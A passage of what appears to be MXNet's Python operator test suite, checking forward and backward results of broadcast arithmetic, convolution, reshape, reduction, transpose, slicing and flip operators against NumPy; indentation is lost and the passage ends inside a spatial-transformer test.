is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
